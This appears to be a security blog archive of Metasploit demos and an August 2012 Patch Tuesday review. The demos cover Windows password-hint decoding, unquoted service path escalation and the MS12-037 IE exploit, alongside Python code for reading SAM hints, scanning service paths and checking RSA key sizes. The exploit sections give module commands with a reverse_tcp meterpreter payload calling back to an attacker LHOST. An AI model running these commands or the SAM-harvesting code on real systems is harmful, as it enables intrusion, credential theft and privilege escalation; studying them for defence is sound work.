Tag Archives: Microsoft

Metasploit Windows User Password Hints Decode Auxiliary Modules

Metasploit provides Microsoft Windows post-exploitation modules that let you dump the local account hashes from the SAM database. Two of them, “post/windows/gather/hashdump” and “post/windows/gather/smart_hashdump”, were recently updated to also retrieve the Windows user password hints. A nice blog post, “All Your Password Hints Are Belong to Us” by claudijd, explains how they extracted and decoded the user password hints from the Windows registry. Below is a short video demonstration of these modifications.

Nice job by @claudijd, @reynoldsrb, @_sinn3r and @TheLightCosine for these upgrades 🙂
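To show how small the decoding step actually is, here is an added Python example; it is my code, not the code of the Metasploit modules nor of claudijd's post. It assumes the layout the post describes: under HKLM\SAM\SAM\Domains\Account\Users each RID subkey holds the account name inside its “V” value (offset and length stored at 0x0C and 0x10, relative to the 0xCC-byte header) and, when a hint was set, a “UserPasswordHint” value that is a raw UTF-16LE string. The function names, the make_v helper and the sample accounts are mine; the SAM hive is only readable as SYSTEM, so the live registry walk is Windows-only and the sample data is constructed.

```python
"""Decode Windows password hints the way a SAM dumper sees them.

Added example, not the code of the Metasploit modules or of claudijd's post.
Assumed layout: each account key under HKLM\\SAM\\SAM\\Domains\\Account\\Users
holds the name inside its "V" value (offset/length at 0x0C/0x10, relative
to the 0xCC-byte header) and, when a hint was set, a "UserPasswordHint"
value that is a raw UTF-16LE string. Reading the hive needs SYSTEM.
"""
import sys

SAM_USERS_KEY = r"SAM\SAM\Domains\Account\Users"


def decode_password_hint(blob: bytes) -> str:
    """UserPasswordHint is raw UTF-16LE: no length prefix, sometimes NUL-terminated."""
    if len(blob) % 2:
        blob = blob[:-1]        # truncated read: drop the dangling byte instead of failing
    return blob.decode("utf-16-le", errors="replace").rstrip("\x00")


def username_from_v(v: bytes) -> str:
    """Pull the account name out of the V value."""
    offset = int.from_bytes(v[0x0C:0x10], "little") + 0xCC
    length = int.from_bytes(v[0x10:0x14], "little")
    return v[offset:offset + length].decode("utf-16-le", errors="replace")


def collect_hints(users: dict) -> dict:
    """users maps RID -> {"V": bytes, "UserPasswordHint": bytes or None}."""
    hints = {}
    for values in users.values():
        hint = values.get("UserPasswordHint")
        if not hint:
            continue            # most accounts never set one; report only those that did
        hints[username_from_v(values["V"])] = decode_password_hint(hint)
    return hints


def make_v(username: str) -> bytes:
    """Constructed V value with only the name fields this example reads filled in."""
    name = username.encode("utf-16-le")
    v = bytearray(0xCC)
    v[0x0C:0x10] = (0).to_bytes(4, "little")            # name starts right after the header
    v[0x10:0x14] = len(name).to_bytes(4, "little")
    return bytes(v) + name


# Constructed sample data, not taken from a real SAM hive.
SAMPLE_USERS = {
    0x1F4: {"V": make_v("Administrator"),
            "UserPasswordHint": "dog's name + 1".encode("utf-16-le")},
    0x3E9: {"V": make_v("alice"),
            "UserPasswordHint": "mot de passe habituel".encode("utf-16-le") + b"\x00\x00"},
    0x3EA: {"V": make_v("bob"), "UserPasswordHint": None},
}


def read_hints_from_registry() -> dict:
    """Live version for Windows: walk the RID subkeys (skipping "Names")."""
    import winreg
    users = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, SAM_USERS_KEY) as root:
        for i in range(winreg.QueryInfoKey(root)[0]):
            sub = winreg.EnumKey(root, i)
            if sub == "Names":
                continue
            with winreg.OpenKey(root, sub) as key:
                v, _ = winreg.QueryValueEx(key, "V")
                try:
                    hint, _ = winreg.QueryValueEx(key, "UserPasswordHint")
                except FileNotFoundError:
                    hint = None
            users[int(sub, 16)] = {"V": v, "UserPasswordHint": hint}
    return collect_hints(users)


if __name__ == "__main__":
    found = read_hints_from_registry() if sys.platform == "win32" else collect_hints(SAMPLE_USERS)
    for user, hint in found.items():
        print(f"{user}: {hint}")
```

Run as SYSTEM on a Windows box (for example from a psexec -s shell) it prints the same user/hint pairs the updated hashdump modules show; anywhere else it runs against the constructed sample. The hint is cleartext by design, which is exactly why it is worth collecting next to the hashes: “dog's name + 1” cuts the cracking space far more than any wordlist rule.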

Windows Service Trusted Path Privilege Escalation Vulnerability Metasploit Demo

Timeline :

Metasploit PoC provided on 2012-08-14

PoC provided by :

sinn3r

Reference(s) :

None

Affected version(s) :

Any Microsoft Windows version running a service whose unquoted image path contains spaces

Tested on Windows XP Pro SP3 with :

OpenVPN 2.1.1

Description :

This module exploits a logic flaw in how CreateProcess resolves the executable to run. When lpApplicationName is NULL and the unquoted lpCommandLine contains a space, the file name is ambiguous. Take the path C:\program files\hello.exe as an example: the Windows API tries, in order, C:\program.exe and then C:\program files\hello.exe, and runs the first one that exists. Many software developers do not expect this behaviour, and it becomes a security problem when an attacker is able to place a malicious executable in one of these unexpected paths; if the affected program is a service running as SYSTEM, this escalates privileges. Software such as OpenVPN 2.1.1, OpenSSH Server 5 and others have this problem. The technique is also described in Writing Secure Code (2nd Edition), Chapter 23, in the section “Calling Processes Securely” on page 676.
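As an added example (my code, not the Metasploit module's), the following Python reproduces the search order described above and flags the candidates an attacker could plant. It assumes the documented CreateProcess behaviour for lpApplicationName == NULL (cut the command line at each space, append .exe to a head without an extension, run the first file that exists) and approximates directory writability with os.access, which ignores the ACL details a real audit would inspect. The service names and image paths in the sample are constructed; the OpenVPN one is modelled on a default install path and is an assumption, not a claim about any particular machine.

```python
"""Enumerate what CreateProcess would try for an unquoted command line with
spaces and flag the candidates an attacker could plant.

Added example, not the Metasploit module's code. Assumptions: the search
order follows the documented CreateProcess rule for lpApplicationName == NULL
(cut at each space, append ".exe" when the head has no extension, run the
first file that exists); writability is approximated with os.access on the
parent directory, which ignores ACL details a real audit would inspect.
"""
import ntpath
import os
import sys

SERVICES_KEY = r"SYSTEM\CurrentControlSet\Services"


def candidate_paths(command_line: str) -> list:
    """Module paths CreateProcess tries, in order, for a command line."""
    command_line = command_line.strip()
    if command_line.startswith('"'):
        # Quoted image path: the module name is unambiguous.
        return [command_line[1:command_line.index('"', 1)]]
    candidates = []
    cut = -1
    while True:
        cut = command_line.find(" ", cut + 1)
        head = command_line if cut == -1 else command_line[:cut]
        if not ntpath.splitext(ntpath.basename(head))[1]:
            head += ".exe"          # no extension: CreateProcess appends .exe
        candidates.append(head)
        if cut == -1:
            return candidates


def hijack_candidates(candidates, exists=os.path.isfile,
                      writable=lambda d: os.access(d, os.W_OK)):
    """Candidates tried before the real binary whose directory we can write to."""
    found = []
    for path in candidates:
        if exists(path):
            break       # CreateProcess stops at the first hit; later ones are never tried
        if writable(ntpath.dirname(path)):
            found.append(path)
    return found


def scan_services() -> dict:
    """Windows only: walk every service ImagePath and report hijackable paths."""
    import winreg
    report = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, SERVICES_KEY) as root:
        for i in range(winreg.QueryInfoKey(root)[0]):
            name = winreg.EnumKey(root, i)
            try:
                with winreg.OpenKey(root, name) as key:
                    image, _ = winreg.QueryValueEx(key, "ImagePath")
            except OSError:
                continue    # no ImagePath (driver stub) or a key we cannot read
            image = os.path.expandvars(image)
            if " " not in image or image.startswith('"'):
                continue
            hits = hijack_candidates(candidate_paths(image))
            if hits:
                report[name] = hits
    return report


# Constructed sample: the OpenVPN path is modelled on a default install,
# the second service is invented to show a deeper split.
SAMPLE_IMAGE_PATHS = {
    "OpenVPNService": r"C:\Program Files\OpenVPN\bin\openvpnserv.exe",
    "FooAgent": r"C:\Program Files\Foo Agent 2.0\bin\agent.exe -service",
}

if __name__ == "__main__":
    if sys.platform == "win32":
        for svc, hits in scan_services().items():
            print(f"{svc}: {hits}")
    else:
        for svc, image in SAMPLE_IMAGE_PATHS.items():
            print(f"{svc}: {candidate_paths(image)}")
```

On Windows the registry walk reads the same ImagePath values the module inspects, so its output should match what trusted_service_path reports. Whether a standard user can create C:\Program.exe or C:\Program Files\Foo.exe depends on the Windows version and the ACLs of the installation, so check rather than assume; the fix on the developer side is simply to quote the path in the service's binPath.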

Commands :

You need a valid session on the target, obtained for example with :

exploit/windows/browser/ms12_037_same_id

Then run the following local exploit, which detects vulnerable services and attempts to exploit one :

use exploit/windows/local/trusted_service_path
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
set LPORT 4443
exploit

sysinfo
getuid

MS12-037 Internet Explorer CVE-2012-1876 Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered by VUPEN Security and reported to ZDI
Vulnerability reported to the vendor by ZDI on 2012-03-14
Public release of the vulnerability on 2012-06-12
Details of the vulnerability provided by VUPEN on 2012-07-10
Metasploit PoC provided on 2012-07-31

PoC provided by :

Alexandre Pelletier
mr_me
binjo
sinn3r
juan vazquez

Reference(s) :

MS12-037
CVE-2012-1876
OSVDB-82866
ZDI-12-093

Affected version(s) :

Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Internet Explorer 9

Tested on Windows XP Pro SP3 with :

Internet Explorer 8 (8.0.6001.18702) and msvcrt ROP

Description :

This module exploits a heap overflow vulnerability in Internet Explorer caused by incorrect handling of the span attribute of col elements in a fixed-layout table when they are modified dynamically by JavaScript code.

Commands :

use exploit/windows/browser/ms12_037_ie_colspan
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

Microsoft August 2012 Patch Tuesday Review

Microsoft released, on 14 August 2012, during its August Patch Tuesday, two security advisories and nine security bulletins. Of the nine security bulletins, five have a Critical security rating.

Microsoft Security Advisory 2661254

MSA-2661254 follows on from the Flame malware attacks. Microsoft now allows restricting the use of certificates with RSA keys shorter than 1024 bits. This advisory will be pushed as a security update during the October 2012 Patch Tuesday, so you have two months to assess its impact. We strongly recommend testing it before deploying it to all your Windows systems; KB2661254 lists the known issues with this security update. For example, Internet Explorer will not allow access to a website secured with an RSA certificate whose key is shorter than 1024 bits.
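To assess the impact before the update lands you need to know which of your certificates carry RSA keys shorter than 1024 bits. The following Python is an added example (mine, not Microsoft's tooling): with only the standard library it reads the modulus length out of a DER SubjectPublicKeyInfo, or out of a DER certificate, and applies the 1024-bit threshold from the advisory. The ASN.1 layout follows RFC 5280 and PKCS#1; the sample moduli and the certificate shell are constructed here rather than generated, and the function names are mine.

```python
"""Flag RSA keys shorter than 1024 bits, the property MSA-2661254 enforces.

Added example, not Microsoft's tooling. Only the standard library is used:
a minimal DER walker over SubjectPublicKeyInfo (RFC 5280) wrapping a PKCS#1
RSAPublicKey, plus the walk from a DER certificate down to that structure.
Sample keys and the certificate shell are constructed here, not generated.
"""
MIN_RSA_BITS = 1024
RSA_OID = bytes.fromhex("2a864886f70d010101")        # 1.2.840.113549.1.1.1 rsaEncryption


def der_read(buf: bytes, pos: int):
    """Read one DER tag-length-value at pos; return (tag, value, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                                  # long form: next n bytes hold the length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def der_encode(tag: int, value: bytes) -> bytes:
    """Encode one DER TLV with a definite length."""
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + value


def der_int(i: int) -> bytes:
    b = i.to_bytes((i.bit_length() + 7) // 8 or 1, "big")
    if b[0] & 0x80:
        b = b"\x00" + b                               # keep the INTEGER positive
    return der_encode(0x02, b)


def spki_from_rsa(n: int, e: int = 65537) -> bytes:
    """SubjectPublicKeyInfo for an RSA public key (n, e)."""
    alg = der_encode(0x30, der_encode(0x06, RSA_OID) + der_encode(0x05, b""))
    key = der_encode(0x30, der_int(n) + der_int(e))
    return der_encode(0x30, alg + der_encode(0x03, b"\x00" + key))   # BIT STRING, 0 unused bits


def spki_from_certificate(cert_der: bytes) -> bytes:
    """Return the SubjectPublicKeyInfo TLV from a DER X.509 certificate."""
    _, cert, _ = der_read(cert_der, 0)                 # Certificate
    _, tbs, _ = der_read(cert, 0)                      # TBSCertificate
    pos = 0
    tag, _, nxt = der_read(tbs, 0)
    if tag == 0xA0:                                    # optional [0] EXPLICIT version
        pos = nxt
    for _ in range(5):                                 # serial, sig alg, issuer, validity, subject
        _, _, pos = der_read(tbs, pos)
    _, _, nxt = der_read(tbs, pos)
    return tbs[pos:nxt]


def rsa_modulus_bits(spki: bytes):
    """Modulus length in bits, or None when the key is not RSA."""
    _, body, _ = der_read(spki, 0)
    _, alg, pos = der_read(body, 0)
    oid_tag, oid, _ = der_read(alg, 0)
    if oid_tag != 0x06 or oid != RSA_OID:
        return None                                    # ECC etc.: the 1024-bit rule does not apply
    _, bitstr, _ = der_read(body, pos)
    _, rsakey, _ = der_read(bitstr[1:], 0)             # skip the unused-bits octet
    _, modulus, _ = der_read(rsakey, 0)
    return int.from_bytes(modulus, "big").bit_length()


def blocked_by_msa2661254(spki: bytes) -> bool:
    bits = rsa_modulus_bits(spki)
    return bits is not None and bits < MIN_RSA_BITS


def fake_certificate(spki: bytes) -> bytes:
    """Constructed, unsigned certificate shell: enough structure to exercise the walk."""
    alg = der_encode(0x30, der_encode(0x06, bytes.fromhex("2a864886f70d01010b")) + der_encode(0x05, b""))
    tbs = der_encode(0x30, der_encode(0xA0, der_int(2)) + der_int(1) + alg
                     + der_encode(0x30, b"") * 3 + spki)
    return der_encode(0x30, tbs + alg + der_encode(0x03, b"\x00"))


# Constructed moduli: the byte pattern only fixes the bit length, these are not real keys.
SAMPLE_KEYS = {
    "legacy-intranet-512": spki_from_rsa(int.from_bytes(b"\xc3" * 64, "big") | 1),
    "ok-1024": spki_from_rsa(int.from_bytes(b"\xc3" * 128, "big") | 1),
    "current-2048": spki_from_rsa(int.from_bytes(b"\xc3" * 256, "big") | 1),
}


def weak_keys(keys: dict) -> list:
    """Names of the keys the October 2012 update would refuse."""
    return [name for name, spki in keys.items() if blocked_by_msa2661254(spki)]


if __name__ == "__main__":
    for name, spki in SAMPLE_KEYS.items():
        print(f"{name}: {rsa_modulus_bits(spki)} bits, blocked={blocked_by_msa2661254(spki)}")
```

Feed spki_from_certificate the DER bytes of a certificate exported from the store (base64-decode the PEM body first) and you get the same verdict the patched CryptoAPI will give. On a Windows box the quick equivalent is a PowerShell one-liner over the store, Get-ChildItem Cert:\LocalMachine\My | Where-Object { $_.PublicKey.Key.KeySize -lt 1024 }, but the DER walk above also works on exported chains from appliances and internal CAs that never touch a Windows store.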

Microsoft Security Advisory 2737111

MSA-2737111 deals with vulnerabilities in third-party code, the Oracle Outside In libraries, that affect Microsoft Exchange Server 2007, Microsoft Exchange Server 2010 and FAST Search Server 2010 for SharePoint. These Oracle vulnerabilities were patched in the July 2012 Oracle Critical Patch Update. The MS12-058 security bulletin addresses them for Microsoft Exchange. These Oracle Outside In vulnerabilities have also been publicly disclosed.

MS12-052 – Cumulative Security Update for Internet Explorer

MS12-052 security update, classified as Critical, allowing remote code execution, is the fix for four privately reported vulnerabilities. CVE-2012-1526 has a CVSS base score of 9.3 and was discovered and privately reported by GWSlabs. CVE-2012-2521 has a CVSS base score of 9.3 and was discovered and privately reported by Derek Soeder. CVE-2012-2522 has a CVSS base score of 9.3 and was discovered and privately reported by Sung-ting Tsai and Ming-Chieh Pan of Trend Micro. CVE-2012-2523 has a CVSS base score of 9.3 and was discovered and privately reported by Cris Neckar of Google’s Chrome Security Team.

MS12-053 – Vulnerability in Remote Desktop Could Allow Remote Code Execution

MS12-053 security update, classified as Critical, allowing remote code execution, fixes one vulnerability, CVE-2012-2526. This vulnerability has a CVSS base score of 9.3 and was discovered and privately reported by Edward Torkington.

MS12-054 – Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution

MS12-054 security update, classified as Critical, allowing remote code execution, fixes four privately reported vulnerabilities. All of them were reported by Yamata Li. CVE-2012-1850 has a CVSS base score of 5.0. CVE-2012-1851, CVE-2012-1852 and CVE-2012-1853 have a CVSS base score of 10.0.

MS12-055 – Vulnerability in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege

MS12-055 security update, classified as Important, allowing elevation of privilege, fixes one vulnerability, CVE-2012-2527. This vulnerability has a CVSS base score of 7.2 and was discovered and privately reported by Mateusz Jurczyk of Google Inc.

MS12-056 – Vulnerability in JScript and VBScript Engines Could Allow Remote Code Execution

MS12-056 security update, classified as Important, allowing remote code execution, fixes one vulnerability, CVE-2012-2523 (the same issue is also covered by MS12-052). This vulnerability has a CVSS base score of 9.3 and was discovered and privately reported by Cris Neckar of Google’s Chrome Security Team.

MS12-057 – Vulnerability in Microsoft Office Could Allow Remote Code Execution

MS12-057 security update, classified as Important, allowing remote code execution, fixes one vulnerability, CVE-2012-2524. This vulnerability has a CVSS base score of 9.3 and was discovered and privately reported by Andrei Costin.

MS12-058 – Vulnerabilities in Microsoft Exchange Server WebReady Document Viewing Could Allow Remote Code Execution

MS12-058 security update, classified as Critical, allowing remote code execution, fixes 13 vulnerabilities discovered in third-party code, the Oracle Outside In libraries. These vulnerabilities have been publicly disclosed.

MS12-059 – Vulnerability in Microsoft Visio Could Allow Remote Code Execution

MS12-059 security update, classified as Important, allowing remote code execution, fixes one vulnerability, CVE-2012-1888. This vulnerability has a CVSS base score of 9.3 and was discovered and privately reported by Alexander Gavrun.

MS12-060 – Vulnerability in Windows Common Controls Could Allow Remote Code Execution

MS12-060 security update, classified as Critical, allowing remote code execution, fixes one vulnerability, CVE-2012-1856. This vulnerability has a CVSS base score of 9.3 and was discovered and privately reported by an unnamed security researcher.